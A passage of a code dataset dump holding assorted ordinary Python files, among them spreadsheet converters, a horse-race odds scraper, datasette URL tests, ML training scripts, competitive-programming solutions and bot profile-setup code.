df_out.to_excel('tmp.xlsx',sheet_name='data')\n\n EW = pandas.ExcelWriter(fileName)\n df1.to_excel(EW) #df1是一个DataFrame结构的数据\n EW.save()\n\nif __name__ == '__main__':\n ExcelTest()\n","sub_path":"libs/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"564915004","text":"__version__ = \"1.0.0\"\n__version_info__ = (1, 0, 0)\n__license__ = \"Unlicense\"\n__author__ = 'Gu Jianzhong '\n\nimport re , sys\ntry:\n import ujson as json # Speedup if present; no big deal if not\nexcept ImportError:\n import json\n\n#\n# this function is copied from json_cleaner.py\n# https://gist.github.com/liftoff/ee7b81659673eca23cd9fc0d8b8e68b7\n#\ndef remove_trailing_commas(json_like):\n \"\"\"\n Removes trailing commas from *json_like* and returns the result. Example::\n\n >>> remove_trailing_commas('{\"foo\":\"bar\",\"baz\":[\"blah\",],}')\n '{\"foo\":\"bar\",\"baz\":[\"blah\"]}'\n \"\"\"\n trailing_object_commas_re = re.compile(\n r'(,)\\s*}(?=([^\"\\\\]*(\\\\.|\"([^\"\\\\]*\\\\.)*[^\"\\\\]*\"))*[^\"]*$)')\n trailing_array_commas_re = re.compile(\n r'(,)\\s*\\](?=([^\"\\\\]*(\\\\.|\"([^\"\\\\]*\\\\.)*[^\"\\\\]*\"))*[^\"]*$)')\n # Fix objects {} first\n objects_fixed = trailing_object_commas_re.sub(\"}\", json_like)\n # Now fix arrays/lists [] and return the result\n return trailing_array_commas_re.sub(\"]\", objects_fixed)\n\nwith open('crossbar.conf','r') as f:\n s = f.read()\n f.close()\n conf=json.loads(remove_trailing_commas(s))\n\n#print(conf.keys())\n#sys.exit(0)\n\nimport openpyxl\nwb = openpyxl.Workbook(write_only=True)\nfor tbl in conf.keys():\n wb.create_sheet(title=tbl)\n sheet = wb[tbl]\n heads = list(conf[tbl][0].keys())\n #print(heads)\n sheet.append(heads)\n for row in conf[tbl]:\n sheet.append(list(row.values()))\nwb.save('auto-conf.xlsx')\n\n#for tag in conf.keys():\n# print('****' + tag + ':')\n# for ele in conf[tag]:\n# if tag == 'crossbar-connects':\n# print(','.join(str(x) for x in [ele['id'],ele['sourceIdx'],ele['zoneIdx'],ele['sinkIdx']]))\n# else:\n# print(','.join(str(x) for x in [ele['id'],ele['channels'],ele['offset'],ele['name']]))\n","sub_path":"conf2xlsx.py","file_name":"conf2xlsx.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"444913984","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport lxml.html\nimport pandas as pd\n\nimport re\nimport datetime\nfrom time import sleep\nfrom argparse import ArgumentParser\n\n# クローリング・スクレイピングのメイン関数\ndef get_win_odds_list(open_date,output_mode,target_race_course,target_race_no):\n # pandasの標準出力の桁揃えオプション\n pd.set_option('display.unicode.east_asian_width', True)\n\n # 引数事前処理\n open_info = get_open_info(open_date) # 対象日付より開催情報を取得\n target_race_course_code = conversion_racecourse(target_race_course) # 競馬場名をコードに変換\n target_race_no_fill = str(target_race_no).zfill(2) # レースNoを2桁に変換\n\n # メイン処理\n for race_place in open_info:\n if race_place[\"race_course\"] == target_race_course_code:\n win_odds_url = format_win_odds_url(race_place[\"race_course\"],race_place[\"race_times\"],race_place[\"race_day\"],target_race_no_fill)\n sleep(1)\n # 出力モードSの場合は標準出力にprint、出力モードDの場合はDataFrame形式でreturn\n if output_mode == 'S':\n\n print(get_win_odds_df(win_odds_url))\n elif output_mode == 'D':\n return get_win_odds_df(win_odds_url)\n\n\n# 単勝オッズページを引数に指定して、そのページから馬番・馬名・単勝オッズを取得し、DataFrame形式で返す\ndef get_win_odds_df(url):\n # Seleniumを用いてクローリング\n driver = webdriver.PhantomJS() # PhamtomJSのWebDriverオブジェクトを作成する。\n driver.get(url) # オッズ表示画面を開く\n sleep(1) # 負荷分散の為のsleep\n root = lxml.html.fromstring(driver.page_source) # 検索結果を表示し、lxmlで解析準備\n\n # 辞書・リストの初期化\n win_odds_dict = {}\n horse_number_list = []\n horse_name_list = []\n tan_odds_list = []\n\n # 馬番・馬名・単勝オッズをスクレイピング\n for horse_number,horse_name,tan_odds in zip(root.cssselect('.umaban'),root.cssselect('.h_name'),root.cssselect('[axis^=oddsDataTan]')):\n horse_number_list.append(horse_number.text)\n horse_name_list.append(horse_name.text)\n tan_odds_list.append(tan_odds.text)\n\n # スクレイピング結果を辞書からDataFrame形式に変換\n win_odds_dict[\"horse_number\"] = horse_number_list\n win_odds_dict[\"horse_name\"] = horse_name_list\n win_odds_dict[\"tan_odds\"] = tan_odds_list\n win_odds_df = pd.DataFrame(win_odds_dict,columns=['horse_number', 'horse_name', 'tan_odds'])\n\n return win_odds_df\n\n\n# 単勝オッズ取得対象ページのURLを整形する\ndef format_win_odds_url(race_course,race_times,race_day,race_no):\n win_odds_url_template = \"http://race.netkeiba.com/?pid=odds&id=p\"\n year = datetime.date.today().year\n\n win_odds_url = win_odds_url_template + str(year) + str(race_course) + str(race_times) + str(race_day) + str(race_no)\n\n return win_odds_url\n\n# 引数に指定したmmdd形式の日付で開催されるレースの開催情報を取得しリストで返す\ndef get_open_info(mmdd):\n race_list_url_template = \"http://race.netkeiba.com/?pid=race_list&id=p\"\n race_list_url = race_list_url_template + mmdd\n\n open_info_list = []\n\n # スクレイピング処理\n driver = webdriver.PhantomJS()\n driver.get(race_list_url)\n root = lxml.html.fromstring(driver.page_source)\n for open_info in root.cssselect('.kaisaidata'):\n open_info_dict = {}\n m = re.match(r\"(\\d+)回(..)(\\d+)日目\", open_info.text)\n open_info_dict[\"race_times\"] = m.group(1).zfill(2) # 開催回を2桁に整形\n open_info_dict[\"race_course\"] = conversion_racecourse(m.group(2)) # 開催競馬場をコード変換\n open_info_dict[\"race_day\"] = m.group(3).zfill(2) # 開催日を2桁に整形\n open_info_list.append(open_info_dict)\n\n '''\n スクレイピング結果\n [\n {'race_course': '04', 'race_day': '10', 'race_times': '02'},\n {'race_course': '10', 'race_day': '10', 'race_times': '02'},\n {'race_course': '01', 'race_day': '04', 'race_times': '02'}\n ]\n '''\n\n return open_info_list\n\n# 競馬場から2桁の競馬場コードへの変換関数\ndef conversion_racecourse(rc_name):\n rc_code = \"\"\n\n if rc_name == \"札幌\":\n rc_code = \"01\"\n elif rc_name == \"函館\":\n rc_code = \"02\"\n elif rc_name == \"福島\":\n rc_code = \"03\"\n elif rc_name == \"新潟\":\n rc_code = \"04\"\n elif rc_name == \"東京\":\n rc_code = \"05\"\n elif rc_name == \"中山\":\n rc_code = \"06\"\n elif rc_name == \"中京\":\n rc_code = \"07\"\n elif rc_name == \"京都\":\n rc_code = \"08\"\n elif rc_name == \"阪神\":\n rc_code = \"09\"\n elif rc_name == \"小倉\":\n rc_code = \"10\"\n\n return rc_code\n\n\nif __name__ == '__main__':\n # 引数処理\n parser = ArgumentParser(description='Process some integers.')\n ## 日付(必須)\n parser.add_argument('-d','--date', help='date(mmdd)', required=True)\n ## 競馬場名(必須・入力値制限)\n parser.add_argument('-c','--race_course', help='Race Course',choices=['札幌','函館','福島','新潟','東京','中山','中京','京都','阪神','小倉'],required=True)\n ## レース番号(任意・デフォルト11・入力値制限)\n parser.add_argument('-n','--race_no', help='Race No',default=11, type=int, choices=range(1, 13))\n ## 出力モード(任意・デフォルト値S・入力値制限)\n parser.add_argument('-m','--output_mode', help='OutputMode S:stdout D:dataframe',default='S',choices=['S','D'])\n\n args = parser.parse_args()\n\n # 引数で指定された情報を変数に格納\n open_date = args.date # 開催情報をクローリングしたい日付を格納\n output_mode = args.output_mode # アウトプットモードを格納\n target_race_course = args.race_course # 指定した競馬場名を格納\n target_race_no = args.race_no # 指定したレース番号を格納\n\n # クローリング・スクレイピング実行\n get_win_odds_list(open_date,output_mode,target_race_course,target_race_no)\n","sub_path":"scraper/get_win_odds.py","file_name":"get_win_odds.py","file_ext":"py","file_size_in_byte":6627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"556712009","text":"from datasette.app import Datasette\nfrom .fixtures import app_client_with_hash\nimport pytest\n\n\n@pytest.fixture(scope=\"module\")\ndef ds():\n return Datasette([], memory=True)\n\n\n@pytest.mark.parametrize(\n \"base_url,path,expected\",\n [\n (\"/\", \"/\", \"/\"),\n (\"/\", \"/foo\", \"/foo\"),\n (\"/prefix/\", \"/\", \"/prefix/\"),\n (\"/prefix/\", \"/foo\", \"/prefix/foo\"),\n (\"/prefix/\", \"foo\", \"/prefix/foo\"),\n ],\n)\ndef test_path(ds, base_url, path, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.path(path) == expected\n\n\n@pytest.mark.parametrize(\n \"base_url,expected\",\n [\n (\"/\", \"/\"),\n (\"/prefix/\", \"/prefix/\"),\n ],\n)\ndef test_instance(ds, base_url, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.instance() == expected\n\n\n@pytest.mark.parametrize(\n \"base_url,file,expected\",\n [\n (\"/\", \"foo.js\", \"/-/static/foo.js\"),\n (\"/prefix/\", \"foo.js\", \"/prefix/-/static/foo.js\"),\n ],\n)\ndef test_static(ds, base_url, file, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.static(file) == expected\n\n\n@pytest.mark.parametrize(\n \"base_url,plugin,file,expected\",\n [\n (\n \"/\",\n \"datasette_cluster_map\",\n \"datasette-cluster-map.js\",\n \"/-/static-plugins/datasette_cluster_map/datasette-cluster-map.js\",\n ),\n (\n \"/prefix/\",\n \"datasette_cluster_map\",\n \"datasette-cluster-map.js\",\n \"/prefix/-/static-plugins/datasette_cluster_map/datasette-cluster-map.js\",\n ),\n ],\n)\ndef test_static_plugins(ds, base_url, plugin, file, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.static_plugins(plugin, file) == expected\n\n\n@pytest.mark.parametrize(\n \"base_url,expected\",\n [\n (\"/\", \"/-/logout\"),\n (\"/prefix/\", \"/prefix/-/logout\"),\n ],\n)\ndef test_logout(ds, base_url, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.logout() == expected\n\n\n@pytest.mark.parametrize(\n \"base_url,expected\",\n [\n (\"/\", \"/:memory:\"),\n (\"/prefix/\", \"/prefix/:memory:\"),\n ],\n)\ndef test_database(ds, base_url, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.database(\":memory:\") == expected\n # Do table and query while we are here\n assert ds.urls.table(\":memory:\", \"name\") == expected + \"/name\"\n assert ds.urls.query(\":memory:\", \"name\") == expected + \"/name\"\n\n\n@pytest.mark.parametrize(\"base_url\", [\"/\", \"/prefix/\"])\ndef test_database_hashed(app_client_with_hash, base_url):\n ds = app_client_with_hash.ds\n original_base_url = ds._config[\"base_url\"]\n try:\n ds._config[\"base_url\"] = base_url\n db_hash = ds.get_database(\"fixtures\").hash\n assert len(db_hash) == 64\n expected = \"{}fixtures-{}\".format(base_url, db_hash[:7])\n assert ds.urls.database(\"fixtures\") == expected\n assert ds.urls.table(\"fixtures\", \"name\") == expected + \"/name\"\n assert ds.urls.query(\"fixtures\", \"name\") == expected + \"/name\"\n finally:\n # Reset this since fixture is shared with other tests\n ds._config[\"base_url\"] = original_base_url\n","sub_path":"tests/test_internals_urls.py","file_name":"test_internals_urls.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"472153870","text":"from model_seq2vec import *\nfrom model_ed import *\nfrom model_tp import *\nimport sys\nimport yaml\n\ndef main():\n \"\"\"\n Launches model training or inference\n \"\"\"\n ds_yaml = sys.argv[1]\n model_yaml = sys.argv[2]\n with open(ds_yaml+\".yaml\", 'r') as f:\n param = yaml.safe_load(f)\n with open(model_yaml+\".yaml\", 'r') as f:\n hparam = yaml.safe_load(f)\n if hparam[\"model_type\"] == 0 or hparam[\"model_type\"] == 1:\n ds = DatasetTsagi(param[\"tsagi_directory\"], param[\"tsagi_file\"], param[\"input_type\"], param[\"metric_type\"])\n ds.load(input_struct=param[\"input_struct\"],\n nb_steps=param[\"nb_steps\"],\n apply_smooth=param[\"apply_smooth\"],\n log_thr=param[\"log_thr\"],\n criterion=param[\"criterion\"],\n rescale=param[\"rescale\"],\n apply_yolo=param[\"apply_yolo\"],\n cong_thr=param[\"cong_thr\"],\n eps=param[\"eps\"],\n min_samples=param[\"min_samples\"],\n apply_binary=param[\"apply_binary\"],\n percentile=param[\"percentile\"])\n if hparam[\"model_type\"] == 0:\n model = ModelSeq2Vec(dataset=ds,\n name=hparam[\"name\"],\n layers_list=hparam[\"layers_list\"],\n directory=hparam[\"directory\"],\n input_seq_len = hparam[\"input_dim\"],\n output_seq_len = hparam[\"output_dim\"],\n batch_size = hparam[\"batch_size\"],\n epochs = hparam[\"epochs\"],\n learning_rate = hparam[\"learning_rate\"],\n beta_1 = hparam[\"beta_1\"],\n beta_2 = hparam[\"beta_2\"],\n loss = hparam[\"loss\"],\n l2_lambd = hparam[\"l2_lambd\"],\n nb_splits = hparam[\"nb_splits\"],\n train_val_split = hparam[\"train_val_split\"],\n index_file = hparam[\"index_file\"])\n elif hparam[\"model_type\"] == 1:\n model = ModelEncoderDecoder(dataset=ds,\n name=hparam[\"name\"],\n layers_list=hparam[\"layers_list\"],\n directory=hparam[\"directory\"],\n input_seq_len = hparam[\"input_dim\"],\n output_seq_len = hparam[\"output_dim\"],\n batch_size = hparam[\"batch_size\"],\n epochs = hparam[\"epochs\"],\n learning_rate = hparam[\"learning_rate\"],\n beta_1 = hparam[\"beta_1\"],\n beta_2 = hparam[\"beta_2\"],\n loss = hparam[\"loss\"],\n l2_lambd = hparam[\"l2_lambd\"],\n nb_splits = hparam[\"nb_splits\"],\n train_val_split = hparam[\"train_val_split\"],\n index_file = hparam[\"index_file\"])\n elif hparam[\"model_type\"] == 2:\n ds = DatasetTraj(trajs_directory=param[\"trajs_directory\"], plns_directory=param[\"plns_directory\"], weather_directory=param[\"weather_directory\"], input_type=param[\"input_type\"])\n model = ModelTP(dataset=ds,\n name=hparam[\"name\"],\n layers_list=hparam[\"layers_list\"],\n directory=hparam[\"directory\"],\n batch_size = hparam[\"batch_size\"],\n epochs = hparam[\"epochs\"],\n learning_rate = hparam[\"learning_rate\"],\n beta_1 = hparam[\"beta_1\"],\n beta_2 = hparam[\"beta_2\"],\n loss = hparam[\"loss\"],\n l2_lambd = hparam[\"l2_lambd\"],\n nb_splits = hparam[\"nb_splits\"],\n train_val_split = hparam[\"train_val_split\"],\n index_file = hparam[\"index_file\"],\n k_mixture = hparam[\"k_mixture\"])\n if hparam[\"train\"]:\n model.training()\n else:\n if hparam[\"model_type\"] == 0 or hparam[\"model_type\"] == 1:\n model.prediction(hparam[\"use_val\"], hparam[\"plot_type\"], hparam[\"pred_dim\"])\n if hparam[\"model_type\"] == 2:\n model.prediction(hparam[\"use_val\"], hparam[\"pred_dim\"])\n plt.show()\n\nif __name__ == '__main__':\n main()","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"574545702","text":"import tensorflow as tf\n\n#D- is for Discriminator\n#G is for Generator\ncross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True) #no sigmoid is activated at D\n\n@tf.function\ndef discriminator_loss(D,G,x,z):\n real_output=D(x,training=True)\n fake_output=D(G(z,training=True),training=True)\n real_loss = cross_entropy(tf.ones_like(real_output), real_output)\n fake_loss = cross_entropy(tf.zeros_like(fake_output), fake_output)\n total_loss = real_loss + fake_loss\n return total_loss\n# L_to_Maximize=tf.reduce_mean(tf.math.log(D(x))+tf.math.log(1-D(G(z))))\n# L_to_Minimize=-L_to_Maximize # maximize L means minimize -L\n# return L_to_Minimize\n\n@tf.function\ndef generator_loss(D,G,z):\n fake_output=D(G(z,training=True),training=True)\n return cross_entropy(tf.ones_like(fake_output), fake_output)\n# L_to_Minimize=tf.reduce_mean(tf.math.log(1-D(G(z))))\n# return L_to_Minimize\n# L_to_Maximize=tf.reduce_mean(tf.math.log(D(G(z)))) # for inner (0->1) cost goto (-inf ,0)\n# L_to_Minimize=-L_to_Maximize # maximize L means minimize -L\n# return L_to_Minimize","sub_path":"Vanilla-GAN/library/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"53598944","text":"# https://atcoder.jp/contests/abc128/tasks/abc128_c\nn, m = map(int, input().split())\nks = [list(map(int, input().split())) for _ in range(m)]\np = list(map(int, input().split()))\n\ns = []\nans = 0\nfor i in range(m):\n k = ks[i][0]\n l = [ks[i][j] for j in range(1, k+1)]\n s.append(l)\n\nswh = [False for _ in range(n)]\nfor i in range(2 ** n):\n #print('######')\n flag = True\n # スイッチの状態\n for j in range(n):\n if ((i >> j) & 1): swh[j] = True\n else: swh[j] = False\n \n # 現在の状態での各電球の点灯をチェック \n for j in range(m):\n #print('電球{}'.format(j))\n judge = [swh[si-1] for si in s[j]]\n #print(judge)\n if judge.count(True) % 2 != p[j]:\n flag = False\n break\n \n if flag: ans += 1\n #print('ans = {}'.format(ans))\n \nprint(ans)","sub_path":"c/abc128c.py","file_name":"abc128c.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"509498410","text":"from django import template\nfrom django.core.urlresolvers import reverse\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef navbar_element(context, title, url_name):\n \"\"\"\n Insert Bootstrap's `
  • ...
  • ` with specific classes and\n accessibility elements. This tag takes a URL name (with no arguments) that\n is later reversed into proper URL.\n \"\"\"\n url = reverse(url_name)\n return navbar_element_url(context, title, url)\n\n\n@register.simple_tag(takes_context=True)\ndef navbar_element_url(context, title, url):\n \"\"\"\n Insert Bootstrap's `
  • ...
  • ` with specific classes and\n accessibility elements. This tag takes a pre-made URL as an argument.\n \"\"\"\n request = context['request']\n\n active = \"\"\n screen_reader = \"\"\n\n if request.path == url:\n active = 'class=\"active\"'\n screen_reader = '(active)'\n tmplt = '
  • {2} {3}
  • '\n\n return tmplt.format(active, url, title, screen_reader)\n","sub_path":"workshops/templatetags/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"372839055","text":"'''\nnormal method for multi variables\n'''\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('Apple.csv')\n\nx = data.iloc[:,1:6].values\ny = data.iloc[:,-1].values\nno_train_ex = len(y)\n\ntemp = []\nfor d in x:\n temp.append([d[0],d[1]])\ntemp2 = []\nfor d in y:\n temp2.append([d])\n\n\n# X --- size = m x 3\nX = np.array(temp)\nY = np.array(temp2)\n\nx_train,x_test,y_train,y_test = train_test_split(X,Y,test_size = 0.1)\n\ntheta = np.linalg.inv(np.transpose(x_train)@x_train) @ np.transpose(x_train)@y_train\n\nfrom sklearn.linear_model import LinearRegression\nreg = LinearRegression()\nreg.fit(x_train,y_train)\n\n\nlib_pred = reg.predict(x_test)\nmath_pred = x_test@theta\n\ni=0\nlib_diff = 0\nmath_diff = 0\nwhile i 0 else mx.cpu()\n \n net = mlp(**setting['model_params'])\n \n net.initialize(init=mx.init.Xavier(), ctx=ctx, force_reinit=True)\n net.hybridize(static_alloc=True, static_shape=True)\n \n trainer = gluon.Trainer(net.collect_params(), \n opt, setting['opt_params'])\n \n # metrics\n train_acc = mx.metric.Accuracy()\n loss_fn = gluon.loss.SoftmaxCrossEntropyLoss()\n \n est = estimator.Estimator(net=net, \n loss=loss_fn, \n metrics=train_acc, \n trainer=trainer, \n context=ctx)\n \n run = exp.start_logging(tags)\n \n try:\n setting['commit_hash'] = run.git_commit()\n run.save(setting, 'setting.json', mode='json')\n\n checkpoint_handler = CheckpointHandler(model_dir=str(run.path),\n model_prefix='model',\n monitor=train_acc,\n save_best=True,\n max_checkpoints=0)\n \n record_handler = RecordHandler(file_name='log.pkl', \n file_location=run.path)\n\n # ignore warnings for nightly test on CI only\n import warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n est.fit(train_data=train_dl, val_data=test_dl,\n epochs=num_epochs, event_handlers=[checkpoint_handler, record_handler])\n \n except Exception as e:\n run.delete()\n raise ValueError('error occured and delete run folder: {}'.format(e))\n \n\nclass RecordHandler(TrainEnd, EpochEnd):\n \"\"\"loss, metricの値をエポックごとに記録しpickleファイルとして吐き出すHandler\n \n pickle file: \n {'train loss': [0.9, 0.8, ...], 'train acc': [...], ...}\n \"\"\"\n def __init__(self, file_name, file_location):\n super(RecordHandler, self).__init__()\n self.history = {}\n self.file_path = file_location.joinpath(file_name)\n\n def train_end(self, estimator, *args, **kwargs):\n # Print all the losses at the end of training\n print(\"Training ended\")\n pd.to_pickle(self.history, self.file_path)\n \n def epoch_end(self, estimator, *args, **kwargs):\n for metric in estimator.train_metrics:\n name, val = metric.get()\n self.history.setdefault(name, []).append(val)\n \n for metric in estimator.val_metrics:\n name, val = metric.get()\n self.history.setdefault(name, []).append(val)\n ","sub_path":"utils/train_module.py","file_name":"train_module.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"2314204","text":"# leetcode 122:\r\n\r\n# leetcode 122:\r\n# algo Find valley and next peak find profit and keep finding valleys and peaks this way and calculate profits\r\nclass Solution:\r\n def maxProfit(self, prices: List[int]) -> int:\r\n if len(prices) == 0:\r\n return 0\r\n # variables\r\n i = 0\r\n valley = prices[0]\r\n peak = prices[0]\r\n max_profit = 0\r\n while i < len(prices) - 1: # last element will be taken care of in th while loop itself\r\n while i < len(prices) - 1 and prices[i] >= prices[i + 1]: # case when we find a valley at i+1\r\n i += 1\r\n valley = prices[i] # i+1 in the while loop is i here\r\n while i < len(prices) - 1 and prices[i] < prices[i + 1]: # case when we find a peak at i+1\r\n i += 1\r\n peak = prices[i]\r\n max_profit += peak - valley # this case peak and valley at the end become equal and this leads to adding zero\r\n return max_profit\r\n\r\n\r\n# algo : 2 pointer approach, low and high gave tem in an tuple\r\n# for every tock we find a point till we find value greater than the bought value and if the value is found then calculate profit, find till we get highest profit , in case we encounter a value lower than bought value after g=making some profit, then put that as profit earned and move on to buying next stock\r\nclass Solution:\r\n def maxProfit(self, prices: List[int]) -> int:\r\n prof_final = 0\r\n # edge case\r\n if not (prices) or len(prices) <= 1:\r\n return prof_final\r\n # 2 pointers\r\n low_high = (-1, -1)\r\n # profit calacualtor\r\n prof = 0\r\n for i in range(1, len(prices), 1):\r\n if prices[i] - prices[i - 1] >= 0:\r\n if prof == 0: # case when profit is not made with thsis tock yet\r\n low_high = (i - 1, i)\r\n prof = prices[i] - prices[i - 1]\r\n else: # case when profit is already made with this stock\r\n low_high = (low_high[0], i)\r\n prof = prices[i] - prices[low_high[0]]\r\n else: # casea new stock is to be bought\r\n low_high = (i, -1) # intitiate low pointer\r\n prof_final += prof # ass previous calculated profit to final profit\r\n prof = 0 # start with finding new profit on selling this stock\r\n # final profit\r\n prof_final += prof\r\n return prof_final\r\n\r\n\r\n#best sol : here the peak and valleys will be found by dorectly summing up the positive differences between adjacent stocks\r\n\r\nclass Solution:\r\n def maxProfit(self, prices: List[int]) -> int:\r\n sum_sum = 0\r\n if not (prices) or len(prices) <= 1:\r\n return sum_sum\r\n for i in range(1, len(prices), 1):\r\n # print(i)\r\n if prices[i] - prices[i - 1] > 0:\r\n sum_sum += prices[i] - prices[i - 1]\r\n # i += 1\r\n return sum_sum\r\n","sub_path":"prob_129.py","file_name":"prob_129.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"213137913","text":"import os\r\nimport shutil\r\nimport openpyxl\r\nimport time\r\nfrom requests import get\r\nfrom PIL import Image, ImageDraw, ImageFont\r\n\r\n\r\ndef golden(userdirectory, user):\r\n os.makedirs(userdirectory + \"chess/log\")\r\n os.makedirs(userdirectory + \"chess/match\")\r\n os.makedirs(userdirectory + \"economy/country\")\r\n os.makedirs(userdirectory + \"end-to-end/log\")\r\n os.makedirs(userdirectory + \"end-to-end/match\")\r\n os.makedirs(userdirectory + \"go/log\")\r\n os.makedirs(userdirectory + \"go/match\")\r\n os.makedirs(userdirectory + \"gomoku/log\")\r\n os.makedirs(userdirectory + \"gomoku/match\")\r\n os.makedirs(userdirectory + \"korean-chess/log\")\r\n os.makedirs(userdirectory + \"korean-chess/match\")\r\n os.makedirs(userdirectory + \"reinforce\")\r\n os.makedirs(userdirectory + \"shogi/log\")\r\n os.makedirs(userdirectory + \"shogi/match\")\r\n f = open(userdirectory + \"chess/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"chess/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"chess/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"chess/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"end-to-end/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"end-to-end/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"end-to-end/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"end-to-end/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"go/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"go/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"go/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"go/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"gomoku/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"gomoku/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"gomoku/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"gomoku/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"korean-chess/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"korean-chess/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"korean-chess/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"korean-chess/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"shogi/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"shogi/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"shogi/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"shogi/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"language.txt\", 'w')\r\n f.write(\"English(Default)\")\r\n f.close()\r\n f = open(userdirectory + \"economy/cash.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"economy/bank.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"economy/bank_cool.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"economy/money.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n\r\n\r\ndef silvy(leader, name):\r\n os.makedirs(\"lib/utils/country/\" + leader)\r\n shutil.copy(\"lib/libs/country/country_sample.xlsx\", \"country_sample.xlsx\")\r\n f = openpyxl.load_workbook(\"country_sample.xlsx\")\r\n sheet = f.active\r\n sheet[\"L1\"].value = name\r\n f.save(\"informations.xlsx\")\r\n os.remove(\"country_sample.xlsx\")\r\n shutil.move(\"informations.xlsx\", \"lib/utils/country/\" + leader + \"/informations.xlsx\")\r\n shutil.copy(\"lib/libs/country/units.xlsx\", \"lib/utils/country/\" + leader + \"/units.xlsx\")\r\n\r\n\r\ndef bronse(id):\r\n directory = \"lib/utils/server/\" + str(id) + \"/\"\r\n os.makedirs(directory + \"levels\")\r\n os.makedirs(directory + \"setting/custom\")\r\n os.makedirs(directory + \"setting/forbid\")\r\n f = open(directory + \"setting/custom/leveling_message.txt\", 'w')\r\n f.write(\"None\")\r\n f.close()\r\n\r\n\r\ndef level_card(url, name, rank, level, exp):\r\n with open(name + \".png\", \"wb\") as file:\r\n response = get(url)\r\n file.write(response.content)\r\n image = Image.open(name + '.png')\r\n resize_image = image.resize((320, 320))\r\n resize_image.save(name + '.png')\r\n profile_image = Image.open(name + \".png\")\r\n sample_image = Image.open(\"lib/libs/level/sample_layer1.png\")\r\n sample_image2 = Image.open(\"lib/libs/level/sample_layer2.png\")\r\n font_folder = \"lib/libs/Font/\"\r\n font = ImageFont.truetype(os.path.join(font_folder, 'Qwref.ttf'), 50)\r\n draw = ImageDraw.Draw(sample_image)\r\n sample_image.paste(profile_image, (50, 